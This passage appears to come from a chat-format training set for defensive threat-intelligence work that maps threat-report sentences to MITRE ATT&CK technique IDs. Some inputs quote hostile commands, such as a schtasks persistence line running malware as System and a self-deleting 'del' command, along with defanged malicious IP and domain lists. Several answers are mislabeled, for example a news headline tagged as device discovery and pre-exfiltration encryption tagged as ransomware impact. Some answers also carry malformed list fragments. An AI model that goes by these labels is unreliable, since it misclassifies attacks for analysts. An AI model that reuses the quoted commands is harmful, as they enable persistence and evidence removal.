- "content": "can download remote files."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BADCALL communicates on ports 443 and 8000 with a FakeTLS method."
- },
- {
- "role": "assistant",
- "content": "T1571 - Non-Standard Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware component, test.exe, uses the Windows command \"cmd.exe\" /C whoami” to verify it is running with the elevated privileges of “System” and creates persistence by creating the following scheduled task: schtasks /create /tn \"mysc\" /tr C:\\Users\\Public\\test.exe /sc ONLOGON /ru \"System\" When executed, the malware first establishes a SOCKS5 connection to 192.157.198.103 using TCP port 1913"
- },
- {
- "role": "assistant",
- "content": "T1053 - Scheduled Task/Job', 'T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FrameworkPOS can use DNS tunneling for exfiltration of credit card data."
- },
- {
- "role": "assistant",
- "content": "T1048 - Exfiltration Over Alternative Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Clambling has the ability to capture and store clipboard data."
- },
- {
- "role": "assistant",
- "content": "T1115 - Clipboard Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "When it first starts, BADNEWS crawls the victim's mapped drives and collects documents with the following extensions: .doc, .docx, .pdf, .ppt, .pptx, and .txt."
- },
- {
- "role": "assistant",
- "content": "T1039 - Data from Network Shared Drive"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "tfvn[.]com[.]vnshirkeswitch[.]netguideofgeorgia[.]orggulfclouds[.]sitejhssourcingltd[.]comkamagra4uk[.]compioneerfitting[.]compositronicsindia[.]comscseguros[.]ptspldernet[.]comtoshioco[.]comwww[.]happytohelpyou[.]inIP addressesThe following IP addresses have been observed to be associated with malware campaigns.112.213.89[.]4067.23.254[.]6162.212.33[.]98153.92.5[.]124185.117.22[.]19723.94.188[.]24667.23.254[.]17072.52.150[.]218148.66.136[.]62107.180.24[.]253108.179.246[.]13818.221.35[.]21494.46.15[.]20066.23.237[.]18672.52.150[.]218URLs:The following URLs have been observed to be associated with malware campaigns.https[:]//a[.]pomf[.]cat/http[:]//pomf[.]cat/upload[.]php"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "payloads are obfuscated prior to compilation to inhibit analysis and/or reverse engineering."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bazar can execute a PowerShell script received from C2."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "First, the sample is UPX packed"
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PLEAD can use `ShellExecute` to execute applications."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT32 used the \"netstat -anpo tcp\" command to display TCP connections on the victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "To get a job from the Google Drive account, the Trojan starts by creating a string that has the following structure with each element within the subdomain subjected to the number to character substitution from Table 4: cc. The Trojan will then obtain an OAUTH access token to the Google Drive in the same manner as before when obtaining the unique identifier"
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Nefilim removes itself from the target systems after infection with the following code: del C:\\Users\\admin\\AppData\\Local\\Temp\\.exe\" /s /f /q\""
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has created new services to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The file collection tool used by RainyDay can utilize native API including \"ReadDirectoryChangeW\" for folder monitoring."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The SHAPESHIFT malware is capable of wiping disks, erasing volumes and deleting files, depending on its configuration"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For C0015, the threat actors used Cobalt Strike and Conti ransomware."
- },
- {
- "role": "assistant",
- "content": "T1588.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Command_Create&Inject: This command creates a new process (using a supplied filename as the process name) and then injects malicious code into it"
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Some variants of use SSL to communicate with C2 servers."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DLL side loading is often used to maintain persistence on the compromised system"
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Clop has used a simple XOR operation to decrypt strings."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BlackEnergy has the capability to communicate over a backup channel via plus.google.com."
- },
- {
- "role": "assistant",
- "content": "T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "To recap, on September 18, 2017, we disclosed that CCleaner had been targeted by cybercriminals, in order to distribute malware via the CCleaner installation file. The altered installation file was downloaded by 2.27 million CCleaner customers worldwide. The malware was introduced to the build server of Piriform, the company developing CCleaner, some time between March 11 and July 4, 2017, prior to Avast’s acquisition of Piriform on July 18, 2017"
- },
- {
- "role": "assistant",
- "content": "T1195.002 - Compromise Software Supply Chain"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can inject a malicious DLL into a process."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The 0x1 bit in the control flags is used in this module to specify if the download should be done via HTTPS"
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT28 uses a tool to infect connected USB devices and transmit itself to air-gapped computers when the infected USB device is inserted."
- },
- {
- "role": "assistant",
- "content": "T1091 - Replication Through Removable Media"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gold Dragon stores information gathered from the endpoint in a file named 1.hwp."
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "copies documents under 15MB found on the victim system to is the user's %temp%\\SMB\\ folder. It also copies files from USB devices to a predefined directory."
- },
- {
- "role": "assistant",
- "content": "T1074 - Data Staged"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Exfiltration over control server channel: data is exfiltrated over the control server channel using a custom protocol - Commonly used port: the attackers used common ports such as port 443 for control server communications - Service execution: registers the implant as a service on the victim’s machine - Automated collection: the implant automatically collects data about the victim and sends it to the control server - Data from local system: local system is discovered and data is gathered - Process discovery: implants can list processes running on the system - System time discovery: part of the data reconnaissance method, the system time is also sent to the control server - File deletion:: malware can wipe files indicated by the attacker"
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery', 'T1119 - Automated Collection', 'T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CreepyDrive can use HTTPS for C2 using the Microsoft Graph API."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "However, the campaign that the PDC has recently observed has been delivering this keylogger exclusively"
- },
- {
- "role": "assistant",
- "content": "T1056 - Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Micropsia creates a shortcut to maintain persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Execution through API (Batch file for example). - Application processes discovery with some procedures as the hashes of the name, and directly for the name of the process. File and directory discovery: to search files to encrypt. Encrypt files. Create files"
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mofang's malicious spearphishing attachments required a user to open the file after receiving."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For CostaRicto, the threat actors established domains, some of which appeared to spoof legitimate domains."
- },
- {
- "role": "assistant",
- "content": "T1583.001 - Domains"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Encryption consists of XOR with a hardcoded key for its configuration and RC4 with a predefined password for encrypting the victim’s data"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Carbon uses the \"net view\" command."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Watch on Fox News: Hackers may use fake Netflix app to spy on users As users have become more attached to their mobile devices, they want everything on those devices"
- },
- {
- "role": "assistant",
- "content": "T1120 - Peripheral Device Discovery', 'T1087 - Account Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Grandoreiro can use MSI files to execute DLLs."
- },
- {
- "role": "assistant",
- "content": "T1218.007 - Signed Binary Proxy Execution: Msiexec"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LAPSUS$ has leverage NordVPN for its egress points when targeting intended victims."
- },
- {
- "role": "assistant",
- "content": "T1090 - Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "collects the volumes mapped on the system, and also steals files with the following extensions: .docx, .doc, .pptx, .ppt, .xlsx, .xls, .rtf, and .pdf."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gelsemium has the ability to store its components in the Registry."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Naikon has used administrator credentials for lateral movement in compromised networks."
- },
- {
- "role": "assistant",
- "content": "T1078.002 - Domain Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Goopy has checked for the Google Updater process to ensure Goopy was loaded properly."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The loader component is executed via RUNDLL32.EXE"
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kimsuky has searched for vulnerabilities, tools, and geopolitical trends on Google to target victims."
- },
- {
- "role": "assistant",
- "content": "T1593.002 - Search Engines"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Invoke-PSImage can be used to embed payload data within a new image file."
- },
- {
- "role": "assistant",
- "content": "T1027.009 - Embedded Payloads"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "InvisiMole can use zlib to compress and decompress data."
- },
- {
- "role": "assistant",
- "content": "T1560.002 - Archive Collected Data: Archive via Library"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Taidoor can use \"DeleteFileA\" to remove files from infected hosts."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This adversary group is most commonly associated with a custom PowerShell implant identified as Helminth. The Helminth implant is routinely delivered through macro-enabled Microsoft Office documents requiring user interaction to execute an obfuscated Visual Basic Script"
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TeamTNT has deployed XMRig Docker images to mine cryptocurrency. TeamTNT has also infected Docker containers and Kubernetes clusters with XMRig, and used RainbowMiner and lolMiner for mining cryptocurrency."
- },
- {
- "role": "assistant",
- "content": "T1496 - Resource Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Epic encrypts collected data using a public key framework before sending it over the C2 channel. Some variants encrypt the collected data with AES and encode it with base64 before transmitting it to the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "REvil can download a copy of itself from an attacker controlled IP address to the victim machine."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Javali can read C2 information from Google Documents and YouTube."
- },
- {
- "role": "assistant",
- "content": "T1102.001 - Dead Drop Resolver"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "may collect information the victim's anti-virus software."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can use the Windows API function CreateProcess to execute another process."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A variant is encoded using a simple XOR cipher."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Some variants use SSL to encrypt C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Conficker adds Registry Run keys to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chimera has used \"net user\" for account discovery."
- },
- {
- "role": "assistant",
- "content": "T1087.001 - Account Discovery: Local Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ZeroT gathers the victim's computer name, Windows version, and system language, and then sends it to its C2 server."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Industroyer uses heavily obfuscated code in its Windows Notepad backdoor."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "encrypts with the 3DES algorithm and a hardcoded key prior to exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Several backdoors achieved persistence by adding a Run key."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RDAT can process steganographic images attached to email messages to send and receive C2 commands. RDAT can also embed additional messages within BMP images to communicate with the RDAT operator."
- },
- {
- "role": "assistant",
- "content": "T1001.002 - Data Obfuscation via Steganography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Uses 7-Zip to compress stolen data for exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1560.001 - Archive Collected Data: Archive via Utility"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DCSrv can compare the current time on an infected host with a configuration value to determine when to start the encryption process."
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Get.exe appears to be a custom tool used to scan IP-ranges for HTTP service information. NCC Group and Fox-IT decompiled the tool for analysis. This showed the tool was written in the Python scripting language and packed into a Windows executable file. Though Fox-IT didn’t find any direct occurrences of the tool on the internet, the decompiled code showed strong similarities with the source code of a tool named GetHttpsInfo. GetHttpsInfo scans the internal network for HTTP & HTTPS services. The reconnaissance tool getHttpsInfo is able to discover HTTP servers within the range of a network"
- },
- {
- "role": "assistant",
- "content": "T1046 - Network Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "may store RC4 encrypted configuration information in the Windows Registry."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has been known to use multiple backdoors per campaign."
- },
- {
- "role": "assistant",
- "content": "T1108 - Redundant Access"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sodinokibi attempts to encrypt data in a user's directory and delete shadow copy backups to make data recovery more difficult. This vulnerability is easy for attackers to exploit, as anyone with HTTP access to the WebLogic server could carry out an attack. Attackers have been making use of this exploit in the wild since at least April 17. Initial stages of the ransomware attack occurred on April 25, the day before Oracle released their update. The attackers are downloading the Sodinokibi ransomware. In this case, the attackers simply leveraged the Oracle WebLogic vulnerability, causing the affected server to download a copy of the ransomware from attacker-controlled IP addresses 188.166.74[.]218 and 45.55.211[.]79. The 188.166.74[.]218 IP address is also home to a pair of other malicious domains unrelated to this ransomware attack: arg0s-co[.]uk, which is likely a phishing domain, and projectstore[.]guru, a domain with bogus PDF-related Google search results. The other IP, 45.55.211[.]79, hosts a pair of legitimate Chilean domains, and appears to have been infected and repurposed by the attackers. The attackers were ultimately successful at encrypting a number of systems during this incident. Cisco IR Services and Talos observed the attack requests originating from 130.61.54[.]136"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CrackMapExec can discover specified filetypes and log files on a targeted system."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
